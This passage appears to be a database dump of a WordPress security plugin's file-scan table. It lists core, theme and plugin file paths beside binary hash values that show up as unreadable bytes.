����V�Z��Gen�_','',0,'?'),('a2Q����v�`L�','wp-content/themes/doctors/core/contents/loop_templateContact/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('a=a%���\r�*��\0�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/sections/recommended-actions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YB,ݸ���)(�\n��','*z\nt���e�q�ZR�� ��2\"�\0��','',0,'?'),('aLS�l%|��������','wp-content/themes/vision-lite/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�O���aw�&.��','�簞����zK/�#@J�D��#R�N�@V�|','',0,'?'),('a\\c,I\"5T��#̋�','wp-admin/images/media-button-music.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4^&$o��uf&�','�wWd¼8P�F6�A����ܴ�to-��X\\��a$','',0,'?'),('ai�=hן�ڲU����','wp-content/themes/healthcare/images/newsera01.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�a��U� �W��5E','��F�ӳ#̪�%�(�S�Z��4�/Xu','',0,'?'),('a�F���;��8P�1�b','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/toggle.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p���ć��\Z��%�','\\ L�З���_\"�;U���K8�d�?Y','',0,'?'),('a�A�\'�Eǡ�\r�6� �','wp-content/themes/weblog/acmethemes/customizer/feature-section/feature-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���L\n܆���','E���,*�ο��J���W;t���!���G}','',0,'?'),('a��6-�z3g~��I?�4','wp-content/themes/weblog/acmethemes/hooks/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vmB\n�����|#�R','S{Q��.뗜�����C�aQ����Z8e��','',0,'?'),('a�?��_�ˢ��6j��X','readme.html',0,'c��P���n�HH˭�','c��P���n�HH˭�','8�� 8�9��(L��:v�2l1�TSV����','',0,'?'),('a�J��r���&�-D�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��o��}S}���8.','�$��s�����?;f�Ġ=`\r� ��&��!','',0,'?'),('a����(m�EB�l�','wp-includes/media-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]p�uA@j4� k','|p��!NR�o�*mc�>�8��t���f5-\Z;m6','',0,'?'),('a�c�CH\r��=l@ĸ','wp-admin/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�D���w�o��}�D',' e�S�\nyp|Y��*h�.���ѽ�ʆX','',0,'?'),('a�~*k`D�np�}��f','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+f)��W;kgWJ��','�`�%��qY2��ʌ��?ǽ����ͷ]���','',0,'?'),('a�0�}�踀�@���~','wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fB��RJ���z�L���','�b\n=W��p�����=����3���9�\"֗;','',0,'?'),('a�ai�G����}��\Z �','wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Э�bJ������\r%','�*��>}6��?j-9�N�AJ|�r���w�d�','',0,'?'),('a�&S���T�\"�l�9','wp-content/plugins/wp-cerber/assets/inspector.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zn�d���*k��P�j','� �o���7Xv�o\ZC�D�j����p��','',0,'?'),('a��y�*�N���l��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/repeater/repeater-row.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-T�?�n� ��xTr�','lU<�q74�@�B���s�\\!�0\n(�u�VR��','',0,'?'),('a��e��\'�����+�','wp-content/themes/doctors/core/contents/loop_templateSitemap/skin1/js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('a��-�b��$G�Ι','wp-content/plugins/wp-cerber/assets/flags/sh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�{ͤ�:u�d�','�R<,l��I@�X�ߠ.#pF�g�%1O���6�','',0,'?'),('b��~��!��k�','wp-content/themes/regina-lite/layout/js/plugins/waypoints/waypoints.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0&�r� ���NT�d�H','�J��0w��#n�7/�w\r�Q��x��','',0,'?'),('b2,����}~@��(��0','wp-content/themes/healthcare/images/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','仲H�!w���e�','(!�nu�`$M��mf�:��eh���QU','',0,'?'),('bI.Q� A�h��fj','wp-content/themes/doctors/core/includes/content-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T>u\\��yt��4���','2�6,�dG���7�JQ;$�����Xx6�','',0,'?'),('bY�,��ϥY�r�;�','wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('b���9���GQE��ґ','wp-content/plugins/wp-cerber/assets/flags/lv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���JqW6A���`>','�\0���jn!-xv��+u�j��D���<�7!�5�#','',0,'?'),('b���.ӛ����','wp-content/plugins/wp-cerber/assets/flags/om.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r]-�K��K<ݳ�8�','�;�8K�KI�k�O�[��\0v�U[JR$ ��','',0,'?'),('b��c��bb��X;D�','wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/js/welcome.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Fľ���|v㚂�','<ˡ���.>P�FjV�N������2�����','',0,'?'),('b��HV��mA �Mh�\"�','wp-content/themes/twentytwenty/assets/images/2020-square-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܴ���6T�k�x','�L�w%���7�M��ȴ�x� � >��?\\�','',0,'?'),('b���y�Ekֽ��','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��6��U)�<�c',',���$�u;�鰮9C��W���y����ޖ','',0,'?'),('b�Eǀ��t|Nw�O�G','wp-content/themes/healthcare/menu/default_menu_walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^���=p^\r/��C��^','_#��Xᅫ��H�0[��楇���Y�)^','',0,'?'),('b�\\3�K�*8\"c�(v','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-color-coded-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�3�P��Q��z�~B','���j�5��Y���Or8T�ر~H��)$��]','',0,'?'),('b���HzfW����gw�','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�@���� �|���O�','g�v����K%��oiS�7�.�]�siH��2:p','',0,'?'),('b�,[�\\����u��','wp-content/themes/advance/inc/customizer/panels.php',0,'y*\r�y�Y��O\"uEB�','y*\r�y�Y��O\"uEB�','�6����\0�#T���h��V�P\'u���','',0,'?'),('b���Ҍ &�?�{','wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F�S)8�׆>]�','',0,'?'),('b�+ƴݟ�3�','wp-includes/customize/class-wp-customize-nav-menu-location-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('bK�+x����wF','wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ç4�[�J��#�\'�','/˵t�?���;�!�o��Q$fm<L^��6E\r��x','',0,'?'),('c餟��(Ok1�!͂','wp-admin/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��W�\r��p4>9Z','*MY��P0������+5~���!�9OR�mҩ','',0,'?'),('cr�e��/�3J�\Z','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-editor.php',0,'y������)y1kREX','y������)y1kREX','�_����۪�B��b�k�\Z����Y�H��p�','',0,'?'),('c�4L]�˞��Mc','wp-admin/includes/class-wp-post-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@d�B��#�&&��','{��bk��\r���}� {=��\\�=6�`l�� ','',0,'?'),('c���p �PU3/�','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM���,~/���r','F;���W]��&��z~o\'�/��q�+��','',0,'?'),('c\Z��R�ѷ�o�v[LA�','wp-content/themes/wp-barrister/sidebar-alt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�S\0u�jl\ZP���','&$=lT��5��.���Sc���ڪ( Ծ��N','',0,'?'),('c%a��H�����','wp-admin/images/about-color-palette-vert.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�A�6���q�]�','�^��5P���n��>��:�����,G�I�z�R�','',0,'?'),('c+����r���D�','wp-content/themes/doctors/images/demo/slider_2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{7����Y��(�M','�Y�/P-,D�����q)����i��)���#�y','',0,'?'),('c,���[xޫ�3�\n�@','wp-includes/js/jquery/jquery.masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@`���&n|�}A��','�\\ۙ���� }M�g� �$�0� [���B','',0,'?'),('c42j���x�c��d','wp-includes/Requests/Session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��݆��Ζ���}l�','e`݆�.�:��j�E�\Z�Ұ���5�\Z�)','',0,'?'),('c4ܘ�7έxT�?Z]�o','wp-content/themes/healthcare/images/6-light-box-facebook.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qF�W�̰*�3J��~o','���G�,��rd��t7L��z`��O@kő�^','',0,'?'),('ct���p)ϓ�\Z��','wp-content/themes/healing-touch/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X���� #����#�','',0,'?'),('c��E�cc�/2��F','wp-content/plugins/wp-cerber/assets/flags/ba.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S߫��ܟ�]�A;\Z���','\Z2��u2S��9{��Ө�G�D�+�����1�','',0,'?'),('c�Q��i�����Qv','wp-includes/css/dist/editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','հv��}�Ifs��>�','�J����Tc68H�\Z�s\'9]�6�p���4d','',0,'?'),('c��]�<z�?\"Ɖ)S�','wp-content/themes/regina-lite/layout/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��ja�[$�CV�','��G��Y�����\\��jϤ>���pw��aW','',0,'?'),('c��z8��5Y���','wp-content/plugins/wp-cerber/assets/flags/pr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����M�_6�p�tz','n��S�X��\Z�h�m2��9��q���\Z�Z','',0,'?'),('c�c��q�53�<B�','wp-content/themes/wp-barrister/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߋ���8T9�-�u�Yl','�\"fF)5T�L��Y\"�xl�Ȧԝ3N$虰1:','',0,'?'),('c�ȉ�:�&�s��','wp-content/themes/regina-lite/layout/js/plugins/lazyload/lazyload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d2�.��J䰍?��zp','B*�[�6FU8�Z�����|$�H�{ą��','',0,'?'),('c�c������gu���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('c��[b]��ݽ�JF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I]�U�� X�g����','�T�Ϛ-�1 [�@./i�i��q��0�o','',0,'?'),('d��:w���O�І','wp-includes/ID3/getid3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!N\0�[�5�իk@0','B�#����L�fW������>2�nT����','',0,'?'),('d��1�쵓-�;O��','wp-admin/js/custom-background.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L-Ф�%��l�r�e�','�����ė�\"ٿjz�r�?:j\'��������','',0,'?'),('d���fϴ_8��,���','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/icon-picker/icon-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?���s��} ����','Hu�@\ZЖ�w�O�{.��d���D1���9g�','',0,'?'),('d>�������g 1J','wp-content/themes/advance/inc/kirki/assets/js/controls/editor.js',0,'0K��lF*\r��n�χ4','0K��lF*\r��n�χ4','�n��D�zK~���#�<6�������QD','',0,'?'),('dF=���j��Hc�����','wp-content/plugins/akismet/wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]x�\"�Y�����KJ','\Z�Ia�^���iJ��H�:�j�:���b��','',0,'?'),('d�k�JQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\rc�c�l��?ɴծ','9� ÂM�\0KR���&���#+�vCf��','',0,'?'),('d���Auh��041�','wp-includes/blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\"����#�\'','j��$��)�~ŗH�x���}J�1z�м�v��','',0,'?'),('d�\n�b���{���ޠ��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�_H�B���,��Va','���\"��Vb7r��v+�3��qm�*ee�5hمC;','',0,'?'),('d�0�ٷ\Z�����Ԍn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<3�8xuFR�ĖȦ�E','n��?Q��bz ��٢�)��S*��,Z�','',0,'?'),('d�L:g�i��q�X�i','wp-content/themes/regina-lite/inc/libraries/welcome-screen/inc/class-epsilon-import-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<֍g���sNö�n','#�_�;*~/c�m�/S߭$GN����,','',0,'?'),('d�(��%J��@�G�','wp-admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�N���ﭪ=j\0��','�jG�AV�sF�����j�+�-)�D����','',0,'?'),('d�S��&<;�}ӄ�#','wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css.php',0,'d��9�#=D�-��','d��9�#=D�-��','p�� aк^�\\F}�dL0�m�dҌ��v^;m�','',0,'?'),('d�hħ{q4�2�K\"�','wp-includes/SimplePie/Rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('d�4�j�2U�V��$�P','wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7#Q�&M?»��|�[','Q�D���6���hP���qqM9�F�O��\\O�','',0,'?'),('d�@!��d�J���','wp-includes/js/mediaelement/mejs-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('e\0���h�L���щ��','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I��H��%���Y','���V��/r:s�/�S��l�\"#��:�3�','',0,'?'),('e��e{��:\0�vy','wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�84|�]��h�֤�','����Aݻ�F�d�s`����0$$�{^����=�','',0,'?'),('e\r��Zf���ޞ��|�','wp-includes/js/api-request.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('e\"���{}$Y�J2�G','wp-content/themes/doctors/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SL)�<7lfs�<<� ','O{�0:U�Wek��j�>��\r�Srh]�X��','',0,'?'),('e���Xnj.\\�(&�d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�رm:h�\rGZ�ڋY','t8uU��U��SĒ�qf����S�3i���i�u','',0,'?'),('e�P�f��o!�J�%','wp-content/plugins/wp-cerber/assets/flags/yt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FE=�W��=�\'���','-�*U�� �K-:��햴�O��ա�3','',0,'?'),('e#��Q�����\'��$','wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-default-panel.php',0,'���2h3B�뿳R�?','���2h3B�뿳R�?','�o�xSY���sg�`Ȅ� \"��r6Z��V, C�','',0,'?'),('e.PȴNB�Sx[�&��','wp-admin/includes/class-wp-plugin-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' :\'D<��*T;�G�','W 3\n�\'@G8y��;�FwTD���Zv�X�}��','',0,'?'),('ecA�̧�~����<','wp-content/themes/healthcare/css/font-awesome/less/core.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�J�77phu��Ƿ�',',��w���!s��0�Hr{�DߎQ���1F)�','',0,'?'),('ei��y��,:���T�)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Q�#2Џ���R���','~G)�R���7i-�#��R 9H��ǫ� b','',0,'?'),('ep\r}�u_4������','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`X�c�b7�qNS�','�M���G�] �?u��gP�p1�,�(�V�^���','',0,'?'),('es%�l(�� �{��5Y_','wp-content/themes/healthcare/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�7���È����)K\n\\','_}�!ƭQ~�M�%$�m� ��<S.m����t','',0,'?'),('et��=L���K�q�','wp-content/plugins/redirection/locale/redirection-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',wԎ\"�k���zDW','�=(�����ŹP��7��T�8��w�?v5','',0,'?'),('euo���(���8?5','wp-includes/js/jquery/ui/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('e}0wTnv_�g�~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VE�gO�`#jV�4�C|','�s�c�� ;���*r3$X����G8ͬRK�','',0,'?'),('e���-�է8&�$��','wp-content/themes/doctors/app/includes/getver-n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1S>��N<���p3|{[�','���u�W|��\0��K���\\�ķ��I�A�6','',0,'?'),('e��lsUO|�R}ܝ�i','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('e��__�%��x���','wp-includes/class-snoopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�PQ��I��P4!��','�+� ��uzR�W QW�|��5��� j[;U|�','',0,'?'),('e�^#|ۍ�TЩ��z','wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('eǛ�^�8l_*\\��','wp-content/themes/advance/inc/kirki/assets/js/controls/switch.js',0,'��\'?���6� Q���6','��\'?���6� Q���6','��X=+�>dS����fPu�h�s����}:L�','',0,'?'),('eއ��D�z\r\Z\n���)','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�b*�\0dH��d.','Wq$!MW^f�q]]��Y/�e��>�xW3�\"ѿ','',0,'?'),('fΜtW����O\\m$','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-preset-control.php',0,'�,��\'-�R�4����','�,��\'-�R�4����',']��#�n��Neb�t.�O�>���i^���ӟ�','',0,'?'),('fp������j�H�\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\'N��S.;\r��MT','���2�婢��Mz�֡�XX~��u*<�.v�~','',0,'?'),('f�u3\n�M\\�}6*0�','wp-includes/class-wp-customize-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-j�b�4k2�`�s@','s\'�=*�o�[�垙B����i1�c9C�8P3�.��','',0,'?'),('f�霰f؟|h��U�L','wp-admin/includes/ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�2�r����qh^','��H��\'t�r�\\\\ovV�ߖ����RJVY��p','',0,'?'),('f�4�6l�~�|xlA�w','wp-content/themes/wp-barrister/library/js/modernizr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~]�A�A{��o)�','h��ԙ�e�*���r=>�0����;�O�}�k+','',0,'?'),('f��ŭ�8��;�slV','wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dղ�������5� ',':��s3]9��R�*�w��\n�+#f����ݕ','',0,'?'),('f���*pd ��\n^','wp-content/themes/twentytwentyone/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U3�\"�ӳY&tP�,','�v��nݰFP/���q ��[yG\0�M��','',0,'?'),('f����B�D�Fr\r\r�','wp-includes/Requests/Transport/fsockopen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�r�����QHˆV','Xi���c�R�)R�Ǡ�.�#`jjŏ�3?','',0,'?'),('f�-�$��G2J�d�','wp-content/themes/twentynineteen/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�����/h�f\0W�','�ir���FT��n �Τ�~�NpE��Z�����z','',0,'?'),('f����e��R�)�','wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ߟ�� �8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�73�l��c�P���R','��{�fT�k��3Ub�� AxT�8?�чaݯ�','',0,'?'),('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('fؕ�si\"�l�r-�^','wp-content/themes/weblog/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d}MTۡ�9��Eᾍ�','��e&�Z4X$�� \0�B� 5�;����u͛��|Q','',0,'?'),('f�*���h>��E��','wp-content/themes/doctors/images/demo/user_3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_�8���:�Q�,','���ܵWi�p�f�k�ҵ�?&X��` ��<','',0,'?'),('f둤s#%<XRX�@>�','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*x�&B���!�$fW','�.�7^V�t�Y��U�@Ď�\'~(�:>�k�','',0,'?'),('g\n��[�q��g- i�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��O�߄_�D���','�`�YABO��k[���Ai�\"5\rg���','',0,'?'),('g f[b�d1�F�','wp-content/themes/healing-touch/images/footer-bullets.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�?�(ﯱ,B�','ꃤD��~�=�?�n�ϒ%B�)e����','',0,'?'),('g#��xz����0�ͱ','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-typography-control.php',0,'��#Ժ&��M6S[\n\\=','��#Ժ&��M6S[\n\\=','!TȒ� (:-:+И�A�.�L�i2��Nۗ3C%','',0,'?'),('g#�,vM������:��','wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�o3�HH��䤱�&','�A���A�H�i�:�B�7����t��OFA','',0,'?'),('g+yr���q����D��/','wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zm���f1q��˴','�nl\Z���h�1he�-�M��5�Nl��bd�Hpz�','',0,'?'),('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�2ң��A�!�V0I','�\"CG9^��ȷ�1��a�?�a�uk`','',0,'?'),('g=�C<4��b�6�-��','wp-content/themes/weblog/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U5�v_�4Ń^','�d�L֝��u��Q��#:�W�\r.Ӓ�4�','',0,'?'),('gC1N(�q;3�)h','wp-content/plugins/wp-cerber/assets/flags/ez.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('gE\n���X�F)4\0y�\'','wp-content/plugins/wp-cerber/assets/flags/gt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ�2�\Z>���^�','�\ndJj7ؖ�S��y�a�{���Sm�Բ','',0,'?'),('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�A�ݲ�1 \"�Q�','J� �%�D��_su4vs��NB=�c��','',0,'?'),('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('g��i�v\Z0�X�A�','wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-loading.php',0,'�\"��_�[T������','�\"��_�[T������','��P�(�Y`���A�[b�v�z>з3w\n','',0,'?'),('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),('g�$G\\��;�r���1X','wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),('g����~ �^W��㷙h','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/typography/typography.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�*�J�A��a��l','E3g?�,Vu�)V%�ͪAt�Ҟ�z��<�R','',0,'?'),('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('g��x]Ǧn�U���L','wp-content/themes/doctors/core/assets/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��?c:]�]��>�[�','�n��J�k��1��h��g��l�5̷���y\0@_','',0,'?'),('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php',1,